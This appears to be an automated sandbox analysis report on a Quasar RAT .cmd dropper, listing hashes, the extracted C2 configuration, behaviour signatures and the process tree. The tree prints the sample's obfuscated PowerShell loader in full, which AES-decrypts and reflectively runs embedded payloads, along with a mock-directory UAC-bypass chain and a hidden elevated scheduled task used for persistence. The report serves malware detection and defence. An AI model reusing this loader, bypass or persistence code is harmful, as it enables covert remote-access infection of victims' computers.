Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/10/2024, 01:54

General

  • Target

    1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485.cmd

  • Size

    537KB

  • MD5

    d20bf8dba792e2edc3e0eb7e5c30b32b

  • SHA1

    7094e6e59004962f3d3161aa3016ecfcf2b3a64f

  • SHA256

    1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

  • SHA512

    c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

  • SSDEEP

    12288:100ynYtHxuu7eaSvaoBTiFrrdkrw1vH5FiaPQdgEMlB:10KtR3lehBAr/1vian1B

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key

    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Runs PowerShell with a hidden display window.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function 
([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:512
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2092
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:228
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:112
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2168
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2280
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4544
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1184
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3168
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4416
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4424
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2396
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2148
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', 
'/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:4996
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3052
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1304
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1084
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1860
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4004
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 896
              5⤵
              • Program crash
              PID:3516
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4876
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485')
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4464
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4544 -ip 4544
      1⤵
        PID:980

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        1KB

        MD5

        928d36ad618a369ffebf44885d07cf81

        SHA1

        edf5a353a919c1873af8e6a0dfafa4c38c626975

        SHA256

        d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

        SHA512

        4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Filesize

        53KB

        MD5

        3337d66209faa998d52d781d0ff2d804

        SHA1

        6594b85a70f998f79f43cdf1ca56137997534156

        SHA256

        9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

        SHA512

        8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        b468cbca91962cba64f84422d738e6f2

        SHA1

        cdaf2f51d0c3f750377a704c86c67adff0ec5617

        SHA256

        601407a3f7ff415d933dae5e6f2f0479349d8e84a745f98c94ae99dd30977ac7

        SHA512

        85e55e702c71385e0d21278e5570733631dcb5cae6623d740317807d3c4b0f43f64117567de66e67e0ac9d688aed3b6f8605d8ea2d4218ffc8a08c9671b89ee4

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        18KB

        MD5

        fb63f94df04e957843377cd9d212b1c0

        SHA1

        5a8684f89ae0187e9b3856b80ee4202d6088ca5e

        SHA256

        0ca604e3339a335467af11834569f84160b0cafb5e97702f464004827e9d142d

        SHA512

        a0d36984d0de47007f4c6d412436f9e9956b766627959e72855b2fc8df799bcd4c2292294601073642ceca10b19f2655e313c93b5e90dc280bc8dea025b27687

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        21KB

        MD5

        55f05fc0d90e580f10874f328bc6747d

        SHA1

        e88ffd9daddb38800f2e72b9b4305d738a1323f9

        SHA256

        252005216ca32358a1a17a43a1797f8aee83161553232651a2581148d682073f

        SHA512

        ec897a0cb9fa76692827fe5a96ef1b96ba98e75255a2a65aeb262c6d5b7df1f5b9a7ba64b937c80c94c73c24560a4acf5dd96b0de619a54c470d06c04cecc88b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        420B

        MD5

        66fbdc363098bb4d74b1ffb12a9e8848

        SHA1

        393b3ef59db212c95c4debc66757ece531ce73b4

        SHA256

        de9be2d489f3c295636c0a7c8806242f74db46d27160d7eadb18815e16b0052a

        SHA512

        804b8dd30058c83fb7f276f98623af9cd53b4daac2bef2cd22449ed01ba9dde60a9db0030cd6c5bed1cb796231f5c703189333e01f49b3cf56114d1b759ce850

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        7284f2bbdaa6a201dde977e16e03938f

        SHA1

        1ba4f163ad07026e51e15dcc63c4bc6e12b8de1d

        SHA256

        43bad0e8e32503be7d77158888ea58d5f08a1aa61568e3acc1db20b869444d14

        SHA512

        70fd7ef2943fa346c3f12b0735dd6a620a0a5f3ae5c67a98e2a8138e2c9e5a7baa8b0a4c8a51515c637be2c6722643c53b0333747c779f15b79d9ce4fae166ae

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        19KB

        MD5

        a7ba4bb093d54c741ddfc3787efcba3b

        SHA1

        dd9743a291e2b31365658070b9ef27e818ad87a4

        SHA256

        755c05aed0c38ab54d76040a61c576b40479dadc13448c5e75bb322ac6eedc8e

        SHA512

        db5c1d21d32e2db3abd3410f4a620d5b86f20c4f1605bf5d90795471f6452f46fea87490e0d7bd178aacc40b370d40f05c718c7d2578c9913ddbb2e951cda1bf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        21KB

        MD5

        6f0102075117d72cad70be22f21bfe51

        SHA1

        15eb170494182cfec37c7b56aa7ce50afc6a23fe

        SHA256

        c10a882c42d375fe1c905aa4fd4d3f4325da9905f9d5d558a98828ba1b67112c

        SHA512

        688577071607c31c557760e19b2185a53a1607b6edc4f5844b4f7ef97375f37c0a5cd07530bfcf472daff004594223efede1ffc0260e04a86140f768f6b26722

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        19KB

        MD5

        ccb107538c41a829f0a951643bd0f2d4

        SHA1

        5c875be012acd1be1c4e8ffade41d243d6096416

        SHA256

        b41c3085bf3e2a7bad8d931d7a83863993d32570a804df5afbe9303c82f40ee4

        SHA512

        670750a10a8594bde5f7c48ead52fce2f49d62bf672675b6e47c5c1b58487d8ebe6048f06cde9ae84141972cfb9c6c8b48c8608c0e619d556b6c0cd767d6815e

      • C:\Users\Admin\AppData\Local\Temp\SC.cmd

        Filesize

        537KB

        MD5

        d20bf8dba792e2edc3e0eb7e5c30b32b

        SHA1

        7094e6e59004962f3d3161aa3016ecfcf2b3a64f

        SHA256

        1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

        SHA512

        c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c5gxcdwv.wbv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd

        Filesize

        1.6MB

        MD5

        d7239bc304b1d9d4ae192e2570419d53

        SHA1

        dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

        SHA256

        7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

        SHA512

        d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

      • C:\Windows \System32\ComputerDefaults.exe

        Filesize

        66KB

        MD5

        cfa65b13918526579371c138108a7ddb

        SHA1

        28bc560c542c405e08001f95c4ea0511e5211035

        SHA256

        4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

        SHA512

        7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

      • C:\Windows \System32\MLANG.dll

        Filesize

        93KB

        MD5

        dc73eb0945a5e0246479de101537c9d8

        SHA1

        b4a9d97c2c6a43944a92bc6356e9be2582918da7

        SHA256

        a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

        SHA512

        0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

      • memory/112-107-0x000000000A920000-0x000000000A9D2000-memory.dmp

        Filesize

        712KB

      • memory/112-116-0x000000000F110000-0x000000000F122000-memory.dmp

        Filesize

        72KB

      • memory/112-117-0x000000000F170000-0x000000000F1AC000-memory.dmp

        Filesize

        240KB

      • memory/112-110-0x000000000EAB0000-0x000000000F0C8000-memory.dmp

        Filesize

        6.1MB

      • memory/112-108-0x000000000E2C0000-0x000000000E482000-memory.dmp

        Filesize

        1.8MB

      • memory/112-106-0x000000000A810000-0x000000000A860000-memory.dmp

        Filesize

        320KB

      • memory/112-94-0x00000000051D0000-0x00000000051DA000-memory.dmp

        Filesize

        40KB

      • memory/112-93-0x000000000A500000-0x000000000A592000-memory.dmp

        Filesize

        584KB

      • memory/112-92-0x000000000DB40000-0x000000000E0E4000-memory.dmp

        Filesize

        5.6MB

      • memory/112-91-0x0000000007A70000-0x0000000007D94000-memory.dmp

        Filesize

        3.1MB

      • memory/112-90-0x0000000007940000-0x0000000007A72000-memory.dmp

        Filesize

        1.2MB

      • memory/112-89-0x0000000002D70000-0x0000000002D7C000-memory.dmp

        Filesize

        48KB

      • memory/1084-197-0x0000000005FE0000-0x0000000006002000-memory.dmp

        Filesize

        136KB

      • memory/1860-210-0x0000000007750000-0x0000000007761000-memory.dmp

        Filesize

        68KB

